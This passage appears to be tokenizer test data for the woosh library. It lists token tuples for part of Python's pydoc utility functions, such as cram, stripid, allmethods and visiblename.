woosh.Token(woosh.OP, ')', 212, 24, 212, 25),
woosh.Token(woosh.OP, ':', 212, 25, 212, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 212, 26, 213, 0),
woosh.Token(woosh.INDENT, ' ', 213, 0, 213, 4),
woosh.Token(woosh.STRING, '"""Do a series of global replacements on a string."""', 213, 4, 213, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 213, 57, 214, 0),
woosh.Token(woosh.NAME, 'while', 214, 4, 214, 9),
woosh.Token(woosh.NAME, 'pairs', 214, 10, 214, 15),
woosh.Token(woosh.OP, ':', 214, 15, 214, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 214, 16, 215, 0),
woosh.Token(woosh.INDENT, ' ', 215, 0, 215, 8),
woosh.Token(woosh.NAME, 'text', 215, 8, 215, 12),
woosh.Token(woosh.OP, '=', 215, 13, 215, 14),
woosh.Token(woosh.NAME, 'pairs', 215, 15, 215, 20),
woosh.Token(woosh.OP, '[', 215, 20, 215, 21),
woosh.Token(woosh.NUMBER, '1', 215, 21, 215, 22),
woosh.Token(woosh.OP, ']', 215, 22, 215, 23),
woosh.Token(woosh.OP, '.', 215, 23, 215, 24),
woosh.Token(woosh.NAME, 'join', 215, 24, 215, 28),
woosh.Token(woosh.OP, '(', 215, 28, 215, 29),
woosh.Token(woosh.NAME, 'text', 215, 29, 215, 33),
woosh.Token(woosh.OP, '.', 215, 33, 215, 34),
woosh.Token(woosh.NAME, 'split', 215, 34, 215, 39),
woosh.Token(woosh.OP, '(', 215, 39, 215, 40),
woosh.Token(woosh.NAME, 'pairs', 215, 40, 215, 45),
woosh.Token(woosh.OP, '[', 215, 45, 215, 46),
woosh.Token(woosh.NUMBER, '0', 215, 46, 215, 47),
woosh.Token(woosh.OP, ']', 215, 47, 215, 48),
woosh.Token(woosh.OP, ')', 215, 48, 215, 49),
woosh.Token(woosh.OP, ')', 215, 49, 215, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 215, 50, 216, 0),
woosh.Token(woosh.NAME, 'pairs', 216, 8, 216, 13),
woosh.Token(woosh.OP, '=', 216, 14, 216, 15),
woosh.Token(woosh.NAME, 'pairs', 216, 16, 216, 21),
woosh.Token(woosh.OP, '[', 216, 21, 216, 22),
woosh.Token(woosh.NUMBER, '2', 216, 22, 216, 23),
woosh.Token(woosh.OP, ':', 216, 23, 216, 24),
woosh.Token(woosh.OP, ']', 216, 24, 216, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 216, 25, 217, 0),
woosh.Token(woosh.DEDENT, ' ', 217, 0, 217, 4),
woosh.Token(woosh.NAME, 'return', 217, 4, 217, 10),
woosh.Token(woosh.NAME, 'text', 217, 11, 217, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 217, 15, 218, 0),
woosh.Token(woosh.DEDENT, '', 219, 0, 219, 0),
woosh.Token(woosh.NAME, 'def', 219, 0, 219, 3),
woosh.Token(woosh.NAME, 'cram', 219, 4, 219, 8),
woosh.Token(woosh.OP, '(', 219, 8, 219, 9),
woosh.Token(woosh.NAME, 'text', 219, 9, 219, 13),
woosh.Token(woosh.OP, ',', 219, 13, 219, 14),
woosh.Token(woosh.NAME, 'maxlen', 219, 15, 219, 21),
woosh.Token(woosh.OP, ')', 219, 21, 219, 22),
woosh.Token(woosh.OP, ':', 219, 22, 219, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 219, 23, 220, 0),
woosh.Token(woosh.INDENT, ' ', 220, 0, 220, 4),
woosh.Token(woosh.STRING, '"""Omit part of a string if needed to make it fit in a maximum length."""', 220, 4, 220, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 220, 77, 221, 0),
woosh.Token(woosh.NAME, 'if', 221, 4, 221, 6),
woosh.Token(woosh.NAME, 'len', 221, 7, 221, 10),
woosh.Token(woosh.OP, '(', 221, 10, 221, 11),
woosh.Token(woosh.NAME, 'text', 221, 11, 221, 15),
woosh.Token(woosh.OP, ')', 221, 15, 221, 16),
woosh.Token(woosh.OP, '>', 221, 17, 221, 18),
woosh.Token(woosh.NAME, 'maxlen', 221, 19, 221, 25),
woosh.Token(woosh.OP, ':', 221, 25, 221, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 221, 26, 222, 0),
woosh.Token(woosh.INDENT, ' ', 222, 0, 222, 8),
woosh.Token(woosh.NAME, 'pre', 222, 8, 222, 11),
woosh.Token(woosh.OP, '=', 222, 12, 222, 13),
woosh.Token(woosh.NAME, 'max', 222, 14, 222, 17),
woosh.Token(woosh.OP, '(', 222, 17, 222, 18),
woosh.Token(woosh.NUMBER, '0', 222, 18, 222, 19),
woosh.Token(woosh.OP, ',', 222, 19, 222, 20),
woosh.Token(woosh.OP, '(', 222, 21, 222, 22),
woosh.Token(woosh.NAME, 'maxlen', 222, 22, 222, 28),
woosh.Token(woosh.OP, '-', 222, 28, 222, 29),
woosh.Token(woosh.NUMBER, '3', 222, 29, 222, 30),
woosh.Token(woosh.OP, ')', 222, 30, 222, 31),
woosh.Token(woosh.OP, '//', 222, 31, 222, 33),
woosh.Token(woosh.NUMBER, '2', 222, 33, 222, 34),
woosh.Token(woosh.OP, ')', 222, 34, 222, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 222, 35, 223, 0),
woosh.Token(woosh.NAME, 'post', 223, 8, 223, 12),
woosh.Token(woosh.OP, '=', 223, 13, 223, 14),
woosh.Token(woosh.NAME, 'max', 223, 15, 223, 18),
woosh.Token(woosh.OP, '(', 223, 18, 223, 19),
woosh.Token(woosh.NUMBER, '0', 223, 19, 223, 20),
woosh.Token(woosh.OP, ',', 223, 20, 223, 21),
woosh.Token(woosh.NAME, 'maxlen', 223, 22, 223, 28),
woosh.Token(woosh.OP, '-', 223, 28, 223, 29),
woosh.Token(woosh.NUMBER, '3', 223, 29, 223, 30),
woosh.Token(woosh.OP, '-', 223, 30, 223, 31),
woosh.Token(woosh.NAME, 'pre', 223, 31, 223, 34),
woosh.Token(woosh.OP, ')', 223, 34, 223, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 223, 35, 224, 0),
woosh.Token(woosh.NAME, 'return', 224, 8, 224, 14),
woosh.Token(woosh.NAME, 'text', 224, 15, 224, 19),
woosh.Token(woosh.OP, '[', 224, 19, 224, 20),
woosh.Token(woosh.OP, ':', 224, 20, 224, 21),
woosh.Token(woosh.NAME, 'pre', 224, 21, 224, 24),
woosh.Token(woosh.OP, ']', 224, 24, 224, 25),
woosh.Token(woosh.OP, '+', 224, 26, 224, 27),
woosh.Token(woosh.STRING, "'...'", 224, 28, 224, 33),
woosh.Token(woosh.OP, '+', 224, 34, 224, 35),
woosh.Token(woosh.NAME, 'text', 224, 36, 224, 40),
woosh.Token(woosh.OP, '[', 224, 40, 224, 41),
woosh.Token(woosh.NAME, 'len', 224, 41, 224, 44),
woosh.Token(woosh.OP, '(', 224, 44, 224, 45),
woosh.Token(woosh.NAME, 'text', 224, 45, 224, 49),
woosh.Token(woosh.OP, ')', 224, 49, 224, 50),
woosh.Token(woosh.OP, '-', 224, 50, 224, 51),
woosh.Token(woosh.NAME, 'post', 224, 51, 224, 55),
woosh.Token(woosh.OP, ':', 224, 55, 224, 56),
woosh.Token(woosh.OP, ']', 224, 56, 224, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 224, 57, 225, 0),
woosh.Token(woosh.DEDENT, ' ', 225, 0, 225, 4),
woosh.Token(woosh.NAME, 'return', 225, 4, 225, 10),
woosh.Token(woosh.NAME, 'text', 225, 11, 225, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 225, 15, 226, 0),
woosh.Token(woosh.DEDENT, '', 227, 0, 227, 0),
woosh.Token(woosh.NAME, '_re_stripid', 227, 0, 227, 11),
woosh.Token(woosh.OP, '=', 227, 12, 227, 13),
woosh.Token(woosh.NAME, 're', 227, 14, 227, 16),
woosh.Token(woosh.OP, '.', 227, 16, 227, 17),
woosh.Token(woosh.NAME, 'compile', 227, 17, 227, 24),
woosh.Token(woosh.OP, '(', 227, 24, 227, 25),
woosh.Token(woosh.STRING, "r' at 0x[0-9a-f]{6,16}(>+)$'", 227, 25, 227, 53),
woosh.Token(woosh.OP, ',', 227, 53, 227, 54),
woosh.Token(woosh.NAME, 're', 227, 55, 227, 57),
woosh.Token(woosh.OP, '.', 227, 57, 227, 58),
woosh.Token(woosh.NAME, 'IGNORECASE', 227, 58, 227, 68),
woosh.Token(woosh.OP, ')', 227, 68, 227, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 227, 69, 228, 0),
woosh.Token(woosh.NAME, 'def', 228, 0, 228, 3),
woosh.Token(woosh.NAME, 'stripid', 228, 4, 228, 11),
woosh.Token(woosh.OP, '(', 228, 11, 228, 12),
woosh.Token(woosh.NAME, 'text', 228, 12, 228, 16),
woosh.Token(woosh.OP, ')', 228, 16, 228, 17),
woosh.Token(woosh.OP, ':', 228, 17, 228, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 228, 18, 229, 0),
woosh.Token(woosh.INDENT, ' ', 229, 0, 229, 4),
woosh.Token(woosh.STRING, '"""Remove the hexadecimal id from a Python object representation."""', 229, 4, 229, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 229, 72, 230, 0),
woosh.Token(woosh.COMMENT, '# The behaviour of %p is implementation-dependent in terms of case.', 230, 4, 230, 71),
woosh.Token(woosh.NAME, 'return', 231, 4, 231, 10),
woosh.Token(woosh.NAME, '_re_stripid', 231, 11, 231, 22),
woosh.Token(woosh.OP, '.', 231, 22, 231, 23),
woosh.Token(woosh.NAME, 'sub', 231, 23, 231, 26),
woosh.Token(woosh.OP, '(', 231, 26, 231, 27),
woosh.Token(woosh.STRING, "r'\\1'", 231, 27, 231, 32),
woosh.Token(woosh.OP, ',', 231, 32, 231, 33),
woosh.Token(woosh.NAME, 'text', 231, 34, 231, 38),
woosh.Token(woosh.OP, ')', 231, 38, 231, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 231, 39, 232, 0),
woosh.Token(woosh.DEDENT, '', 233, 0, 233, 0),
woosh.Token(woosh.NAME, 'def', 233, 0, 233, 3),
woosh.Token(woosh.NAME, '_is_bound_method', 233, 4, 233, 20),
woosh.Token(woosh.OP, '(', 233, 20, 233, 21),
woosh.Token(woosh.NAME, 'fn', 233, 21, 233, 23),
woosh.Token(woosh.OP, ')', 233, 23, 233, 24),
woosh.Token(woosh.OP, ':', 233, 24, 233, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 233, 25, 234, 0),
woosh.Token(woosh.INDENT, ' ', 234, 0, 234, 4),
woosh.Token(woosh.STRING, '"""\r\n Returns True if fn is a bound method, regardless of whether\r\n fn was implemented in Python or in C.\r\n """', 234, 4, 237, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 237, 7, 238, 0),
woosh.Token(woosh.NAME, 'if', 238, 4, 238, 6),
woosh.Token(woosh.NAME, 'inspect', 238, 7, 238, 14),
woosh.Token(woosh.OP, '.', 238, 14, 238, 15),
woosh.Token(woosh.NAME, 'ismethod', 238, 15, 238, 23),
woosh.Token(woosh.OP, '(', 238, 23, 238, 24),
woosh.Token(woosh.NAME, 'fn', 238, 24, 238, 26),
woosh.Token(woosh.OP, ')', 238, 26, 238, 27),
woosh.Token(woosh.OP, ':', 238, 27, 238, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 238, 28, 239, 0),
woosh.Token(woosh.INDENT, ' ', 239, 0, 239, 8),
woosh.Token(woosh.NAME, 'return', 239, 8, 239, 14),
woosh.Token(woosh.NAME, 'True', 239, 15, 239, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 239, 19, 240, 0),
woosh.Token(woosh.DEDENT, ' ', 240, 0, 240, 4),
woosh.Token(woosh.NAME, 'if', 240, 4, 240, 6),
woosh.Token(woosh.NAME, 'inspect', 240, 7, 240, 14),
woosh.Token(woosh.OP, '.', 240, 14, 240, 15),
woosh.Token(woosh.NAME, 'isbuiltin', 240, 15, 240, 24),
woosh.Token(woosh.OP, '(', 240, 24, 240, 25),
woosh.Token(woosh.NAME, 'fn', 240, 25, 240, 27),
woosh.Token(woosh.OP, ')', 240, 27, 240, 28),
woosh.Token(woosh.OP, ':', 240, 28, 240, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 240, 29, 241, 0),
woosh.Token(woosh.INDENT, ' ', 241, 0, 241, 8),
woosh.Token(woosh.NAME, 'self', 241, 8, 241, 12),
woosh.Token(woosh.OP, '=', 241, 13, 241, 14),
woosh.Token(woosh.NAME, 'getattr', 241, 15, 241, 22),
woosh.Token(woosh.OP, '(', 241, 22, 241, 23),
woosh.Token(woosh.NAME, 'fn', 241, 23, 241, 25),
woosh.Token(woosh.OP, ',', 241, 25, 241, 26),
woosh.Token(woosh.STRING, "'__self__'", 241, 27, 241, 37),
woosh.Token(woosh.OP, ',', 241, 37, 241, 38),
woosh.Token(woosh.NAME, 'None', 241, 39, 241, 43),
woosh.Token(woosh.OP, ')', 241, 43, 241, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 241, 44, 242, 0),
woosh.Token(woosh.NAME, 'return', 242, 8, 242, 14),
woosh.Token(woosh.NAME, 'not', 242, 15, 242, 18),
woosh.Token(woosh.OP, '(', 242, 19, 242, 20),
woosh.Token(woosh.NAME, 'inspect', 242, 20, 242, 27),
woosh.Token(woosh.OP, '.', 242, 27, 242, 28),
woosh.Token(woosh.NAME, 'ismodule', 242, 28, 242, 36),
woosh.Token(woosh.OP, '(', 242, 36, 242, 37),
woosh.Token(woosh.NAME, 'self', 242, 37, 242, 41),
woosh.Token(woosh.OP, ')', 242, 41, 242, 42),
woosh.Token(woosh.NAME, 'or', 242, 43, 242, 45),
woosh.Token(woosh.OP, '(', 242, 46, 242, 47),
woosh.Token(woosh.NAME, 'self', 242, 47, 242, 51),
woosh.Token(woosh.NAME, 'is', 242, 52, 242, 54),
woosh.Token(woosh.NAME, 'None', 242, 55, 242, 59),
woosh.Token(woosh.OP, ')', 242, 59, 242, 60),
woosh.Token(woosh.OP, ')', 242, 60, 242, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 242, 61, 243, 0),
woosh.Token(woosh.DEDENT, ' ', 243, 0, 243, 4),
woosh.Token(woosh.NAME, 'return', 243, 4, 243, 10),
woosh.Token(woosh.NAME, 'False', 243, 11, 243, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 243, 16, 244, 0),
woosh.Token(woosh.DEDENT, '', 246, 0, 246, 0),
woosh.Token(woosh.NAME, 'def', 246, 0, 246, 3),
woosh.Token(woosh.NAME, 'allmethods', 246, 4, 246, 14),
woosh.Token(woosh.OP, '(', 246, 14, 246, 15),
woosh.Token(woosh.NAME, 'cl', 246, 15, 246, 17),
woosh.Token(woosh.OP, ')', 246, 17, 246, 18),
woosh.Token(woosh.OP, ':', 246, 18, 246, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 246, 19, 247, 0),
woosh.Token(woosh.INDENT, ' ', 247, 0, 247, 4),
woosh.Token(woosh.NAME, 'methods', 247, 4, 247, 11),
woosh.Token(woosh.OP, '=', 247, 12, 247, 13),
woosh.Token(woosh.OP, '{', 247, 14, 247, 15),
woosh.Token(woosh.OP, '}', 247, 15, 247, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 247, 16, 248, 0),
woosh.Token(woosh.NAME, 'for', 248, 4, 248, 7),
woosh.Token(woosh.NAME, 'key', 248, 8, 248, 11),
woosh.Token(woosh.OP, ',', 248, 11, 248, 12),
woosh.Token(woosh.NAME, 'value', 248, 13, 248, 18),
woosh.Token(woosh.NAME, 'in', 248, 19, 248, 21),
woosh.Token(woosh.NAME, 'inspect', 248, 22, 248, 29),
woosh.Token(woosh.OP, '.', 248, 29, 248, 30),
woosh.Token(woosh.NAME, 'getmembers', 248, 30, 248, 40),
woosh.Token(woosh.OP, '(', 248, 40, 248, 41),
woosh.Token(woosh.NAME, 'cl', 248, 41, 248, 43),
woosh.Token(woosh.OP, ',', 248, 43, 248, 44),
woosh.Token(woosh.NAME, 'inspect', 248, 45, 248, 52),
woosh.Token(woosh.OP, '.', 248, 52, 248, 53),
woosh.Token(woosh.NAME, 'isroutine', 248, 53, 248, 62),
woosh.Token(woosh.OP, ')', 248, 62, 248, 63),
woosh.Token(woosh.OP, ':', 248, 63, 248, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 248, 64, 249, 0),
woosh.Token(woosh.INDENT, ' ', 249, 0, 249, 8),
woosh.Token(woosh.NAME, 'methods', 249, 8, 249, 15),
woosh.Token(woosh.OP, '[', 249, 15, 249, 16),
woosh.Token(woosh.NAME, 'key', 249, 16, 249, 19),
woosh.Token(woosh.OP, ']', 249, 19, 249, 20),
woosh.Token(woosh.OP, '=', 249, 21, 249, 22),
woosh.Token(woosh.NUMBER, '1', 249, 23, 249, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 249, 24, 250, 0),
woosh.Token(woosh.DEDENT, ' ', 250, 0, 250, 4),
woosh.Token(woosh.NAME, 'for', 250, 4, 250, 7),
woosh.Token(woosh.NAME, 'base', 250, 8, 250, 12),
woosh.Token(woosh.NAME, 'in', 250, 13, 250, 15),
woosh.Token(woosh.NAME, 'cl', 250, 16, 250, 18),
woosh.Token(woosh.OP, '.', 250, 18, 250, 19),
woosh.Token(woosh.NAME, '__bases__', 250, 19, 250, 28),
woosh.Token(woosh.OP, ':', 250, 28, 250, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 250, 29, 251, 0),
woosh.Token(woosh.INDENT, ' ', 251, 0, 251, 8),
woosh.Token(woosh.NAME, 'methods', 251, 8, 251, 15),
woosh.Token(woosh.OP, '.', 251, 15, 251, 16),
woosh.Token(woosh.NAME, 'update', 251, 16, 251, 22),
woosh.Token(woosh.OP, '(', 251, 22, 251, 23),
woosh.Token(woosh.NAME, 'allmethods', 251, 23, 251, 33),
woosh.Token(woosh.OP, '(', 251, 33, 251, 34),
woosh.Token(woosh.NAME, 'base', 251, 34, 251, 38),
woosh.Token(woosh.OP, ')', 251, 38, 251, 39),
woosh.Token(woosh.OP, ')', 251, 39, 251, 40),
woosh.Token(woosh.COMMENT, '# all your base are belong to us', 251, 41, 251, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 251, 73, 252, 0),
woosh.Token(woosh.DEDENT, ' ', 252, 0, 252, 4),
woosh.Token(woosh.NAME, 'for', 252, 4, 252, 7),
woosh.Token(woosh.NAME, 'key', 252, 8, 252, 11),
woosh.Token(woosh.NAME, 'in', 252, 12, 252, 14),
woosh.Token(woosh.NAME, 'methods', 252, 15, 252, 22),
woosh.Token(woosh.OP, '.', 252, 22, 252, 23),
woosh.Token(woosh.NAME, 'keys', 252, 23, 252, 27),
woosh.Token(woosh.OP, '(', 252, 27, 252, 28),
woosh.Token(woosh.OP, ')', 252, 28, 252, 29),
woosh.Token(woosh.OP, ':', 252, 29, 252, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 252, 30, 253, 0),
woosh.Token(woosh.INDENT, ' ', 253, 0, 253, 8),
woosh.Token(woosh.NAME, 'methods', 253, 8, 253, 15),
woosh.Token(woosh.OP, '[', 253, 15, 253, 16),
woosh.Token(woosh.NAME, 'key', 253, 16, 253, 19),
woosh.Token(woosh.OP, ']', 253, 19, 253, 20),
woosh.Token(woosh.OP, '=', 253, 21, 253, 22),
woosh.Token(woosh.NAME, 'getattr', 253, 23, 253, 30),
woosh.Token(woosh.OP, '(', 253, 30, 253, 31),
woosh.Token(woosh.NAME, 'cl', 253, 31, 253, 33),
woosh.Token(woosh.OP, ',', 253, 33, 253, 34),
woosh.Token(woosh.NAME, 'key', 253, 35, 253, 38),
woosh.Token(woosh.OP, ')', 253, 38, 253, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 253, 39, 254, 0),
woosh.Token(woosh.DEDENT, ' ', 254, 0, 254, 4),
woosh.Token(woosh.NAME, 'return', 254, 4, 254, 10),
woosh.Token(woosh.NAME, 'methods', 254, 11, 254, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 254, 18, 255, 0),
woosh.Token(woosh.DEDENT, '', 256, 0, 256, 0),
woosh.Token(woosh.NAME, 'def', 256, 0, 256, 3),
woosh.Token(woosh.NAME, '_split_list', 256, 4, 256, 15),
woosh.Token(woosh.OP, '(', 256, 15, 256, 16),
woosh.Token(woosh.NAME, 's', 256, 16, 256, 17),
woosh.Token(woosh.OP, ',', 256, 17, 256, 18),
woosh.Token(woosh.NAME, 'predicate', 256, 19, 256, 28),
woosh.Token(woosh.OP, ')', 256, 28, 256, 29),
woosh.Token(woosh.OP, ':', 256, 29, 256, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 256, 30, 257, 0),
woosh.Token(woosh.INDENT, ' ', 257, 0, 257, 4),
woosh.Token(woosh.STRING, '"""Split sequence s via predicate, and return pair ([true], [false]).\r\n\r\n The return value is a 2-tuple of lists,\r\n ([x for x in s if predicate(x)],\r\n [x for x in s if not predicate(x)])\r\n """', 257, 4, 262, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 262, 7, 263, 0),
woosh.Token(woosh.NAME, 'yes', 264, 4, 264, 7),
woosh.Token(woosh.OP, '=', 264, 8, 264, 9),
woosh.Token(woosh.OP, '[', 264, 10, 264, 11),
woosh.Token(woosh.OP, ']', 264, 11, 264, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 264, 12, 265, 0),
woosh.Token(woosh.NAME, 'no', 265, 4, 265, 6),
woosh.Token(woosh.OP, '=', 265, 7, 265, 8),
woosh.Token(woosh.OP, '[', 265, 9, 265, 10),
woosh.Token(woosh.OP, ']', 265, 10, 265, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 265, 11, 266, 0),
woosh.Token(woosh.NAME, 'for', 266, 4, 266, 7),
woosh.Token(woosh.NAME, 'x', 266, 8, 266, 9),
woosh.Token(woosh.NAME, 'in', 266, 10, 266, 12),
woosh.Token(woosh.NAME, 's', 266, 13, 266, 14),
woosh.Token(woosh.OP, ':', 266, 14, 266, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 266, 15, 267, 0),
woosh.Token(woosh.INDENT, ' ', 267, 0, 267, 8),
woosh.Token(woosh.NAME, 'if', 267, 8, 267, 10),
woosh.Token(woosh.NAME, 'predicate', 267, 11, 267, 20),
woosh.Token(woosh.OP, '(', 267, 20, 267, 21),
woosh.Token(woosh.NAME, 'x', 267, 21, 267, 22),
woosh.Token(woosh.OP, ')', 267, 22, 267, 23),
woosh.Token(woosh.OP, ':', 267, 23, 267, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 267, 24, 268, 0),
woosh.Token(woosh.INDENT, ' ', 268, 0, 268, 12),
woosh.Token(woosh.NAME, 'yes', 268, 12, 268, 15),
woosh.Token(woosh.OP, '.', 268, 15, 268, 16),
woosh.Token(woosh.NAME, 'append', 268, 16, 268, 22),
woosh.Token(woosh.OP, '(', 268, 22, 268, 23),
woosh.Token(woosh.NAME, 'x', 268, 23, 268, 24),
woosh.Token(woosh.OP, ')', 268, 24, 268, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 268, 25, 269, 0),
woosh.Token(woosh.DEDENT, ' ', 269, 0, 269, 8),
woosh.Token(woosh.NAME, 'else', 269, 8, 269, 12),
woosh.Token(woosh.OP, ':', 269, 12, 269, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 269, 13, 270, 0),
woosh.Token(woosh.INDENT, ' ', 270, 0, 270, 12),
woosh.Token(woosh.NAME, 'no', 270, 12, 270, 14),
woosh.Token(woosh.OP, '.', 270, 14, 270, 15),
woosh.Token(woosh.NAME, 'append', 270, 15, 270, 21),
woosh.Token(woosh.OP, '(', 270, 21, 270, 22),
woosh.Token(woosh.NAME, 'x', 270, 22, 270, 23),
woosh.Token(woosh.OP, ')', 270, 23, 270, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 270, 24, 271, 0),
woosh.Token(woosh.DEDENT, ' ', 271, 0, 271, 4),
woosh.Token(woosh.DEDENT, '', 271, 4, 271, 4),
woosh.Token(woosh.NAME, 'return', 271, 4, 271, 10),
woosh.Token(woosh.NAME, 'yes', 271, 11, 271, 14),
woosh.Token(woosh.OP, ',', 271, 14, 271, 15),
woosh.Token(woosh.NAME, 'no', 271, 16, 271, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 271, 18, 272, 0),
woosh.Token(woosh.DEDENT, '', 273, 0, 273, 0),
woosh.Token(woosh.NAME, 'def', 273, 0, 273, 3),
woosh.Token(woosh.NAME, 'visiblename', 273, 4, 273, 15),
woosh.Token(woosh.OP, '(', 273, 15, 273, 16),
woosh.Token(woosh.NAME, 'name', 273, 16, 273, 20),
woosh.Token(woosh.OP, ',', 273, 20, 273, 21),
woosh.Token(woosh.NAME, 'all', 273, 22, 273, 25),
woosh.Token(woosh.OP, '=', 273, 25, 273, 26),
woosh.Token(woosh.NAME, 'None', 273, 26, 273, 30),
woosh.Token(woosh.OP, ',', 273, 30, 273, 31),
woosh.Token(woosh.NAME, 'obj', 273, 32, 273, 35),
woosh.Token(woosh.OP, '=', 273, 35, 273, 36),
woosh.Token(woosh.NAME, 'None', 273, 36, 273, 40),
woosh.Token(woosh.OP, ')', 273, 40, 273, 41),
woosh.Token(woosh.OP, ':', 273, 41, 273, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 273, 42, 274, 0),
woosh.Token(woosh.INDENT, ' ', 274, 0, 274, 4),
woosh.Token(woosh.STRING, '"""Decide whether to show documentation on a variable."""', 274, 4, 274, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 274, 61, 275, 0),
woosh.Token(woosh.COMMENT, '# Certain special names are redundant or internal.', 275, 4, 275, 54),
woosh.Token(woosh.COMMENT, '# XXX Remove __initializing__?', 276, 4, 276, 34),
woosh.Token(woosh.NAME, 'if', 277, 4, 277, 6),
woosh.Token(woosh.NAME, 'name', 277, 7, 277, 11),
woosh.Token(woosh.NAME, 'in', 277, 12, 277, 14),
woosh.Token(woosh.OP, '{', 277, 15, 277, 16),
woosh.Token(woosh.STRING, "'__author__'", 277, 16, 277, 28),
woosh.Token(woosh.OP, ',', 277, 28, 277, 29),
woosh.Token(woosh.STRING, "'__builtins__'", 277, 30, 277, 44),
woosh.Token(woosh.OP, ',', 277, 44, 277, 45),
woosh.Token(woosh.STRING, "'__cached__'", 277, 46, 277, 58),
woosh.Token(woosh.OP, ',', 277, 58, 277, 59),
woosh.Token(woosh.STRING, "'__credits__'", 277, 60, 277, 73),
woosh.Token(woosh.OP, ',', 277, 73, 277, 74),
woosh.Token(woosh.STRING, "'__date__'", 278, 16, 278, 26),
woosh.Token(woosh.OP, ',', 278, 26, 278, 27),
woosh.Token(woosh.STRING, "'__doc__'", 278, 28, 278, 37),
woosh.Token(woosh.OP, ',', 278, 37, 278, 38),
woosh.Token(woosh.STRING, "'__file__'", 278, 39, 278, 49),
woosh.Token(woosh.OP, ',', 278, 49, 278, 50),
woosh.Token(woosh.STRING, "'__spec__'", 278, 51, 278, 61),
woosh.Token(woosh.OP, ',', 278, 61, 278, 62),
woosh.Token(woosh.STRING, "'__loader__'", 279, 16, 279, 28),
woosh.Token(woosh.OP, ',', 279, 28, 279, 29),
woosh.Token(woosh.STRING, "'__module__'", 279, 30, 279, 42),
woosh.Token(woosh.OP, ',', 279, 42, 279, 43),
woosh.Token(woosh.STRING, "'__name__'", 279, 44, 279, 54),
woosh.Token(woosh.OP, ',', 279, 54, 279, 55),
woosh.Token(woosh.STRING, "'__package__'", 279, 56, 279, 69),
woosh.Token(woosh.OP, ',', 279, 69, 279, 70),
woosh.Token(woosh.STRING, "'__path__'", 280, 16, 280, 26),
woosh.Token(woosh.OP, ',', 280, 26, 280, 27),
woosh.Token(woosh.STRING, "'__qualname__'", 280, 28, 280, 42),
woosh.Token(woosh.OP, ',', 280, 42, 280, 43),
woosh.Token(woosh.STRING, "'__slots__'", 280, 44, 280, 55),
woosh.Token(woosh.OP, ',', 280, 55, 280, 56),
woosh.Token(woosh.STRING, "'__version__'", 280, 57, 280, 70),
woosh.Token(woosh.OP, '}', 280, 70, 280, 71),
woosh.Token(woosh.OP, ':', 280, 71, 280, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 280, 72, 281, 0),
woosh.Token(woosh.INDENT, ' ', 281, 0, 281, 8),
woosh.Token(woosh.NAME, 'return', 281, 8, 281, 14),
woosh.Token(woosh.NUMBER, '0', 281, 15, 281, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 281, 16, 282, 0),
woosh.Token(woosh.COMMENT, '# Private names are hidden, but special names are displayed.', 282, 4, 282, 64),
woosh.Token(woosh.DEDENT, ' ', 283, 0, 283, 4),
woosh.Token(woosh.NAME, 'if', 283, 4, 283, 6),
woosh.Token(woosh.NAME, 'name', 283, 7, 283, 11),
woosh.Token(woosh.OP, '.', 283, 11, 283, 12),
woosh.Token(woosh.NAME, 'startswith', 283, 12, 283, 22),
woosh.Token(woosh.OP, '(', 283, 22, 283, 23),
woosh.Token(woosh.STRING, "'__'", 283, 23, 283, 27),
woosh.Token(woosh.OP, ')', 283, 27, 283, 28),
woosh.Token(woosh.NAME, 'and', 283, 29, 283, 32),
woosh.Token(woosh.NAME, 'name', 283, 33, 283, 37),
woosh.Token(woosh.OP, '.', 283, 37, 283, 38),
woosh.Token(woosh.NAME, 'endswith', 283, 38, 283, 46),
woosh.Token(woosh.OP, '(', 283, 46, 283, 47),
woosh.Token(woosh.STRING, "'__'", 283, 47, 283, 51),
woosh.Token(woosh.OP, ')', 283, 51, 283, 52),
woosh.Token(woosh.OP, ':', 283, 52, 283, 53),
woosh.Token(woosh.NAME, 'return', 283, 54, 283, 60),
woosh.Token(woosh.NUMBER, '1', 283, 61, 283, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 283, 62, 284, 0),
